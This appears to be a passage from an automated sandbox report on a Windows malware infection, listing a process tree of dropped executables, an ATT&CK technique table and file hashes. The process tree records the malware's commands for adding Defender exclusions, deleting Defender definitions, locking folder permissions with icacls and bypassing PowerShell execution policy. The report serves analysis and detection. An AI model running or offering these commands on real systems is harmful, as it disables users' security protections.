                                                                                  • C:\Users\Admin\AppData\Local\Temp\64E1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\64E1.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    PID:696
                                                                                • C:\Users\Admin\AppData\Local\Temp\75C3.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\75C3.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:780
                                                                                • C:\Users\Admin\AppData\Local\Temp\80FB.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\80FB.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1116
                                                                                • C:\Users\Admin\AppData\Local\Temp\8A00.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\8A00.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Windows security modification
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:2760
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1458cc5e-3f7e-4126-9be8-95b9b4414768\AdvancedRun.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\1458cc5e-3f7e-4126-9be8-95b9b4414768\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1458cc5e-3f7e-4126-9be8-95b9b4414768\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2668
                                                                                    • C:\Users\Admin\AppData\Local\Temp\1458cc5e-3f7e-4126-9be8-95b9b4414768\AdvancedRun.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\1458cc5e-3f7e-4126-9be8-95b9b4414768\AdvancedRun.exe" /SpecialRun 4101d8 2668
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2012
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\8A00.exe" -Force
                                                                                    2⤵
                                                                                      PID:972
                                                                                    • C:\Users\Admin\AppData\Local\Temp\8A00.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\8A00.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2520
                                                                                  • C:\Users\Admin\AppData\Local\Temp\9603.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\9603.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Windows security modification
                                                                                    • Modifies system certificate store
                                                                                    PID:2328
                                                                                    • C:\Users\Admin\AppData\Local\Temp\b01fe58d-9b3d-42d6-912b-4a3bd95ba687\AdvancedRun.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\b01fe58d-9b3d-42d6-912b-4a3bd95ba687\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\b01fe58d-9b3d-42d6-912b-4a3bd95ba687\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2208
                                                                                      • C:\Users\Admin\AppData\Local\Temp\b01fe58d-9b3d-42d6-912b-4a3bd95ba687\AdvancedRun.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\b01fe58d-9b3d-42d6-912b-4a3bd95ba687\AdvancedRun.exe" /SpecialRun 4101d8 2208
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:2172
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\9603.exe" -Force
                                                                                      2⤵
                                                                                        PID:2444
                                                                                      • C:\Users\Admin\AppData\Local\Temp\9603.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\9603.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in Program Files directory
                                                                                        PID:2364
                                                                                      • C:\Users\Admin\AppData\Local\Temp\9603.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\9603.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1544
                                                                                      • C:\Users\Admin\AppData\Local\Temp\9603.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\9603.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2688
                                                                                      • C:\Users\Admin\AppData\Local\Temp\9603.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\9603.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2492
                                                                                      • C:\Users\Admin\AppData\Local\Temp\9603.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\9603.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                        PID:956
                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                      1⤵
                                                                                        PID:2720
                                                                                      • C:\Windows\explorer.exe
                                                                                        C:\Windows\explorer.exe
                                                                                        1⤵
                                                                                          PID:2676
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2904
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:896
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2708
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2880
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:976
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2692
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:2652
                                                                                          • C:\Windows\system32\conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe "8856153191559374329-373490712400507440-1398725355-1176549087-941724270105998332"
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                            PID:2744
                                                                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe
                                                                                            "C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe"
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • Suspicious behavior: AddClipboardFormatListener
                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:2976
                                                                                          • C:\Users\Admin\AppData\Local\Temp\A4C3.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\A4C3.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            PID:1600
                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                              icacls "C:\Users\Admin\AppData\Local\7d435f55-1cfa-4aa5-ad10-a5b894e585bc" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                              2⤵
                                                                                              • Modifies file permissions
                                                                                              PID:2744
                                                                                            • C:\Users\Admin\AppData\Local\Temp\A4C3.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\A4C3.exe" --Admin IsNotAutoStart IsNotTask
                                                                                              2⤵
                                                                                                PID:1968
                                                                                                • C:\Users\Admin\AppData\Local\fc039c32-6097-4ed4-988c-4a297e0deace\updatewin1.exe
                                                                                                  "C:\Users\Admin\AppData\Local\fc039c32-6097-4ed4-988c-4a297e0deace\updatewin1.exe"
                                                                                                  3⤵
                                                                                                    PID:1912
                                                                                                    • C:\Users\Admin\AppData\Local\fc039c32-6097-4ed4-988c-4a297e0deace\updatewin1.exe
                                                                                                      "C:\Users\Admin\AppData\Local\fc039c32-6097-4ed4-988c-4a297e0deace\updatewin1.exe" --Admin
                                                                                                      4⤵
                                                                                                        PID:2664
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
                                                                                                          5⤵
                                                                                                            PID:2500
                                                                                                          • C:\Program Files\Windows Defender\mpcmdrun.exe
                                                                                                            "C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all
                                                                                                            5⤵
                                                                                                            • Deletes Windows Defender Definitions
                                                                                                            PID:2948
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"
                                                                                                            5⤵
                                                                                                              PID:2480
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""
                                                                                                              5⤵
                                                                                                                PID:772
                                                                                                          • C:\Users\Admin\AppData\Local\fc039c32-6097-4ed4-988c-4a297e0deace\updatewin2.exe
                                                                                                            "C:\Users\Admin\AppData\Local\fc039c32-6097-4ed4-988c-4a297e0deace\updatewin2.exe"
                                                                                                            3⤵
                                                                                                              PID:2716
                                                                                                            • C:\Users\Admin\AppData\Local\fc039c32-6097-4ed4-988c-4a297e0deace\5.exe
                                                                                                              "C:\Users\Admin\AppData\Local\fc039c32-6097-4ed4-988c-4a297e0deace\5.exe"
                                                                                                              3⤵
                                                                                                                PID:1572
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 232
                                                                                                                  4⤵
                                                                                                                  • Program crash
                                                                                                                  PID:2616
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A85C.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\A85C.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2588

                                                                                                          Network

                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                          Execution

                                                                                                          Command-Line Interface

                                                                                                          1
                                                                                                          T1059

                                                                                                          Persistence

                                                                                                          Modify Existing Service

                                                                                                          1
                                                                                                          T1031

                                                                                                          Registry Run Keys / Startup Folder

                                                                                                          1
                                                                                                          T1060

                                                                                                          BITS Jobs

                                                                                                          1
                                                                                                          T1197

                                                                                                          Defense Evasion

                                                                                                          Impair Defenses

                                                                                                          1
                                                                                                          T1562

                                                                                                          Modify Registry

                                                                                                          7
                                                                                                          T1112

                                                                                                          Disabling Security Tools

                                                                                                          3
                                                                                                          T1089

                                                                                                          File Permissions Modification

                                                                                                          1
                                                                                                          T1222

                                                                                                          BITS Jobs

                                                                                                          1
                                                                                                          T1197

                                                                                                          Install Root Certificate

                                                                                                          1
                                                                                                          T1130

                                                                                                          Credential Access

                                                                                                          Credentials in Files

                                                                                                          3
                                                                                                          T1081

                                                                                                          Discovery

                                                                                                          Software Discovery

                                                                                                          1
                                                                                                          T1518

                                                                                                          Security Software Discovery

                                                                                                          1
                                                                                                          T1063

                                                                                                          Query Registry

                                                                                                          3
                                                                                                          T1012

                                                                                                          System Information Discovery

                                                                                                          3
                                                                                                          T1082

                                                                                                          Peripheral Device Discovery

                                                                                                          1
                                                                                                          T1120

                                                                                                          Remote System Discovery

                                                                                                          1
                                                                                                          T1018

                                                                                                          Collection

                                                                                                          Data from Local System

                                                                                                          3
                                                                                                          T1005

                                                                                                          Command and Control

                                                                                                          Web Service

                                                                                                          1
                                                                                                          T1102

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                            MD5

                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                            SHA1

                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                            SHA256

                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                            SHA512

                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                            MD5

                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                            SHA1

                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                            SHA256

                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                            SHA512

                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                          • C:\Program Files\Google\ZTRWFMWNKZ\ultramediaburner.exe
                                                                                                            MD5

                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                            SHA1

                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                            SHA256

                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                            SHA512

                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                          • C:\Program Files\Google\ZTRWFMWNKZ\ultramediaburner.exe
                                                                                                            MD5

                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                            SHA1

                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                            SHA256

                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                            SHA512

                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                          • C:\Program Files\install.dat
                                                                                                            MD5

                                                                                                            bef5c483c6eba257020201190666e28d

                                                                                                            SHA1

                                                                                                            e7f5cda41f731eea23bc45c0a6c06ad91f1d7df8

                                                                                                            SHA256

                                                                                                            d42b23175385ccc042ffebd37cc0f25847c790fb6f98bad0cd024f70f85b3fce

                                                                                                            SHA512

                                                                                                            302bca91e431e388f7bcff837ab6b7be23a9a38026410589e4ae3c86be057039117897429b5664eccee8a6871904f8e44629acf7d837cece8c701fb6915fdf90

                                                                                                          • C:\Program Files\install.dll
                                                                                                            MD5

                                                                                                            c6a2e4e23319dec9d56f8029ef834e83

                                                                                                            SHA1

                                                                                                            299e80473cbe56b596a2d4d38aea0aab46826167

                                                                                                            SHA256

                                                                                                            6ae4bd10f8bc7f3e5856c7f3571d165787f48d23f95ccfa823a5dab74f7fd554

                                                                                                            SHA512

                                                                                                            2a30529c2254ff481ab099032829d1b533d8bb6fca6a766d04e3febd6dc87ba34852eb7354ffc8d0ed7f584b5bff587e2b549c4f4c9150e98a2ff6a0f751438a

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4
                                                                                                            MD5

                                                                                                            d1b1f562e42dd37c408c0a3c7ccfe189

                                                                                                            SHA1

                                                                                                            c01e61a5c5f44fb038228b7e542f6a8d7c8c283d

                                                                                                            SHA256

                                                                                                            7f468f04fe5a1b0616685f157a4285090b6ed3858d4cd9efe915aaeed83c158e

                                                                                                            SHA512

                                                                                                            404d279fabd4886008e47e9138f799cf398f0aa4c8556192d6e45dbcde99eac2cd65c47b9e0b88bd6d3a6529818f6048a23a197a913fb917b19dffbbd5d75850

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6F5AC3E88228423792AAC8245F6E27FA
                                                                                                            MD5

                                                                                                            a06883b864b1ac4e39bf7bd070a19efc

                                                                                                            SHA1

                                                                                                            e98034242317b0ebbba7cd42db66d9d5828b00b2

                                                                                                            SHA256

                                                                                                            269c8dc936ca798aefff30b671c27e383268dc34556f7b89253897798b9cc12b

                                                                                                            SHA512

                                                                                                            eca5b23d38b2978f133e5ba224df40fa304106f63a583e1d33f43fba2de56fa4045045405eaad3c585aaf94c0f0fc57d2dd1414663b5dde77162f6e25d8eb8a6

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                            MD5

                                                                                                            24df47c0abca3f68afdcab7c519d7c39

                                                                                                            SHA1

                                                                                                            b175a5c0b829e4ae2a8ec10c0f07de9b17667eb9

                                                                                                            SHA256

                                                                                                            dbb2bc09bd21f4cde8453ebe73c8750c694ea9b4070d7bf4a42cbf14958088d0

                                                                                                            SHA512

                                                                                                            28ad5e8a6317c8dc16f2918289503cdb5f5cad18248d77f8aa180fcb3ff8ac582889941cc17ae95749d8f3629c87a867f4ae2d2da3af3c7034f252ae53581b6e

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4
                                                                                                            MD5

                                                                                                            732c138d8217053acdfe0356f05c644a

                                                                                                            SHA1

                                                                                                            76e31d1936bd428ff9b2d2eb747eff473de36c87

                                                                                                            SHA256

                                                                                                            e34b132536fc8e07bf2adb6bf1079fd110c0e7d58efeee1ae6e01729e7e4f6c5

                                                                                                            SHA512

                                                                                                            51513134c6cb0f2ea9d72128bc2b2f585e9201161a62e5a924c731eb33d0bda8aa36e4b540349ab940341919207d9d52732d632e139ed4b77461c4d8df1c5f7f

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6F5AC3E88228423792AAC8245F6E27FA
                                                                                                            MD5

                                                                                                            3f4be66d6da7f5934dacfe06f32bfaad

                                                                                                            SHA1

                                                                                                            75be4e725563dc19fb956f365a60252e238af9ce

                                                                                                            SHA256

                                                                                                            a829fb11b2d2b86f3419f2cc54abb415af3595a47e61ad325b2de767f6791470

                                                                                                            SHA512

                                                                                                            fde224a5eb59f10ec3d3f6df4f28287a51bcbbc6bb29ed01f90b4a55b4977845783ba1b6d90d2773183307c7c1740c0982b3cd65debd713702fc057f72e7f2a7

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                            MD5

                                                                                                            1c35e911354ee2739be6eee4dc4209bc

                                                                                                            SHA1

                                                                                                            307adb396d3c909756dbfbbf3fddc82e91a236ab

                                                                                                            SHA256

                                                                                                            05eaa5b3ea3d494cbb3df0ff81cc425a9f1df8895b1ed98e6891ac1452f3fe9e

                                                                                                            SHA512

                                                                                                            3301ac65179e6d86394e78e42a92b9eb94927f916693e24d414ff30bd4e1da7ea748e16cdfc00241768e716c7f18194053d6aee6d8b60caab4a026895530a2dc

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                            MD5

                                                                                                            04675390d6e825aaf1a34d2852606c49

                                                                                                            SHA1

                                                                                                            fdcdd2c2e7352fcbcd9c10af0304c25310f7a0c6

                                                                                                            SHA256

                                                                                                            d83d57d9388f4696d403f281f5ee1481eced1c65cc6f4718f65eec291114fd07

                                                                                                            SHA512

                                                                                                            8bfc9a952846910062fbbc6cb7a9d849d1deb8a2af6fbce1af4a3d163695bff80b1d33332e97bdb2b38384ba94ddb991c956fd7f04824efd5a2a060e74132408

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                            MD5

                                                                                                            8258cd0e61c8984d8ce9ce330f81e6d5

                                                                                                            SHA1

                                                                                                            5f11fabfd269dff88f8c2fc8e3cf073d05e7d9ed

                                                                                                            SHA256

                                                                                                            9cdf69738e8713084dfd01f05fe58cd33c8643f433a5cc783a2dff9ddf95935d

                                                                                                            SHA512

                                                                                                            9658440ff0644d3b716c56e2a6b042748dfab15b7e776dda10cc7fab52ef5b309c44ad7f1b62266985c1df344af78d341c8bf8456f1560c696a3067dc9044635

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                            MD5

                                                                                                            72ee335d41fbb265889ff8960bfccbfb

                                                                                                            SHA1

                                                                                                            9e25cfc2610b1deaeeaea573f24fd5acfbf7e717

                                                                                                            SHA256

                                                                                                            8fb34fdfacd5aad3ad92157abc0dd699847e0c41d491cd3ce137de29d7d1ec3f

                                                                                                            SHA512

                                                                                                            bcd506d688295aab094f749b1c0a5acccd675e63e7ac36a5d7ca9eb0c3d26bfd9cbc1c11dd5ffb5831cea87d290453bbb46c8714d97f00fb7c7f825fef038370

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                            MD5

                                                                                                            567ca53d416c4bbaf79ad99cdb39b1c2

                                                                                                            SHA1

                                                                                                            70d164d2212cc74aa194365650a5fff44a6e4973

                                                                                                            SHA256

                                                                                                            a72e617fe76ed96ba0b372765c6162512f15b1070260658b0de5e49e33088c89

                                                                                                            SHA512

                                                                                                            689b632b2f177c140f348567087bf8388b90cbc71c492230f3d390e9db92f07a4019de924605bdf509f1aadfbcaf723fbf98299a4817f20cc9d83a91a7b40726

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                            MD5

                                                                                                            e9a990da074e7f72499258a0cff41f01

                                                                                                            SHA1

                                                                                                            fb00f50dee93efa645d7a37f31ce31065c2c2948

                                                                                                            SHA256

                                                                                                            31cce0b96bba9dab7512e13b4ebfc07b941be1534006576874c60a18ad4c1e43

                                                                                                            SHA512

                                                                                                            26427ab7db4630821acbf59b8e9f97f3127fa8621654c7c493911a2cf11194564d0450d37174e42e33600ec057d200c793d273d54c2710a83f2264ddc548f8c4

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1251026093.exe
                                                                                                            MD5

                                                                                                            cca6e302974f8ad2cf237cbb402f7db8

                                                                                                            SHA1

                                                                                                            82483651f9c152a2ccf0a7f6a348c14daf73ccfc

                                                                                                            SHA256

                                                                                                            12da3023f88f28c58bfa10a19cf70481e263bed0ae9bd393369e6ed9b7971827

                                                                                                            SHA512

                                                                                                            cad0b4afd348085070f4a786bdcd62a5d01ca3413f07315956c09489b3ca92e09a893bc1960d25c9a650eeb3d0c4395a1b47d0562b359285794d9e4c0929ae87

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1251026093.exe
                                                                                                            MD5

                                                                                                            cca6e302974f8ad2cf237cbb402f7db8

                                                                                                            SHA1

                                                                                                            82483651f9c152a2ccf0a7f6a348c14daf73ccfc

                                                                                                            SHA256

                                                                                                            12da3023f88f28c58bfa10a19cf70481e263bed0ae9bd393369e6ed9b7971827

                                                                                                            SHA512

                                                                                                            cad0b4afd348085070f4a786bdcd62a5d01ca3413f07315956c09489b3ca92e09a893bc1960d25c9a650eeb3d0c4395a1b47d0562b359285794d9e4c0929ae87

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1394440541.exe
                                                                                                            MD5

                                                                                                            d51901e3386120269c6b08fcaa3816e7

                                                                                                            SHA1

                                                                                                            6b0a36ce8cb5390d4d53800e4bf5281fb0eb5d7e

                                                                                                            SHA256

                                                                                                            afd25aff257a6b31a2377b9633a0f4227da3112976c749c34858d85436d0af5a

                                                                                                            SHA512

                                                                                                            5639773bca6fdeefe91ca58776758c1abd2a8a67824365dd0140800ddaa3935dcd4568eeebe8163f564e8d3754bce65b339163a230bd7d17b5c6e16eb5c345f5

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1394440541.exe
                                                                                                            MD5

                                                                                                            d51901e3386120269c6b08fcaa3816e7

                                                                                                            SHA1

                                                                                                            6b0a36ce8cb5390d4d53800e4bf5281fb0eb5d7e

                                                                                                            SHA256

                                                                                                            afd25aff257a6b31a2377b9633a0f4227da3112976c749c34858d85436d0af5a

                                                                                                            SHA512

                                                                                                            5639773bca6fdeefe91ca58776758c1abd2a8a67824365dd0140800ddaa3935dcd4568eeebe8163f564e8d3754bce65b339163a230bd7d17b5c6e16eb5c345f5

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1zer3ebb.dtp\md1_1eaf.exe
                                                                                                            MD5

                                                                                                            bbdb7bead525d96d5dde3751b4a46bc3

                                                                                                            SHA1

                                                                                                            1842704eef89eaa94135bc056656bdbfc6bce1d3

                                                                                                            SHA256

                                                                                                            acdff264d4464aeb08ef1cc0150ee8c5980fd43df04d63a38bd09aaa09faf51b

                                                                                                            SHA512

                                                                                                            d75adcd1a935961f9134f8d2bd9c7d07c82290554608958dee22d8027a54745cdbacaeb11f832887340160922fbf8f7d3ec52d4d32a1189e09f9905d357b34fe

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1zer3ebb.dtp\md1_1eaf.exe
                                                                                                            MD5

                                                                                                            bbdb7bead525d96d5dde3751b4a46bc3

                                                                                                            SHA1

                                                                                                            1842704eef89eaa94135bc056656bdbfc6bce1d3

                                                                                                            SHA256

                                                                                                            acdff264d4464aeb08ef1cc0150ee8c5980fd43df04d63a38bd09aaa09faf51b

                                                                                                            SHA512

                                                                                                            d75adcd1a935961f9134f8d2bd9c7d07c82290554608958dee22d8027a54745cdbacaeb11f832887340160922fbf8f7d3ec52d4d32a1189e09f9905d357b34fe

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\24-a4150-07e-6a19c-573cba4b2e679\Kenessey.txt
                                                                                                            MD5

                                                                                                            97384261b8bbf966df16e5ad509922db

                                                                                                            SHA1

                                                                                                            2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                            SHA256

                                                                                                            9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                            SHA512

                                                                                                            b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\24-a4150-07e-6a19c-573cba4b2e679\Kizhybipyvu.exe
                                                                                                            MD5

                                                                                                            416cdf5a20930fc452afc2b2226e0296

                                                                                                            SHA1

                                                                                                            7392192ab84730fe2b1d295f78ce9ee228f71c0d

                                                                                                            SHA256

                                                                                                            85420e807cda618caf01eddeb5adbb3875a07eab79ec5d0b442717f219b6bda1

                                                                                                            SHA512

                                                                                                            b1c007ce8e27d1cf17a1ca585672236eabafc54a67b715e8b68af82cd2b837f306d6364a934339c74fa954c61be809a42c4a2b39aa6b1060817cdb0bd9ea371d

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\24-a4150-07e-6a19c-573cba4b2e679\Kizhybipyvu.exe
                                                                                                            MD5

                                                                                                            416cdf5a20930fc452afc2b2226e0296

                                                                                                            SHA1

                                                                                                            7392192ab84730fe2b1d295f78ce9ee228f71c0d

                                                                                                            SHA256

                                                                                                            85420e807cda618caf01eddeb5adbb3875a07eab79ec5d0b442717f219b6bda1

                                                                                                            SHA512

                                                                                                            b1c007ce8e27d1cf17a1ca585672236eabafc54a67b715e8b68af82cd2b837f306d6364a934339c74fa954c61be809a42c4a2b39aa6b1060817cdb0bd9ea371d

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\24-a4150-07e-6a19c-573cba4b2e679\Kizhybipyvu.exe.config
                                                                                                            MD5

                                                                                                            98d2687aec923f98c37f7cda8de0eb19

                                                                                                            SHA1

                                                                                                            f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                            SHA256

                                                                                                            8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                            SHA512

                                                                                                            95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\90-85ab1-b75-bda84-ef90859abf4fb\Gowaekaedika.exe
                                                                                                            MD5

                                                                                                            4aa6bbf2d091a9a87bac124c0adfc3f6

                                                                                                            SHA1

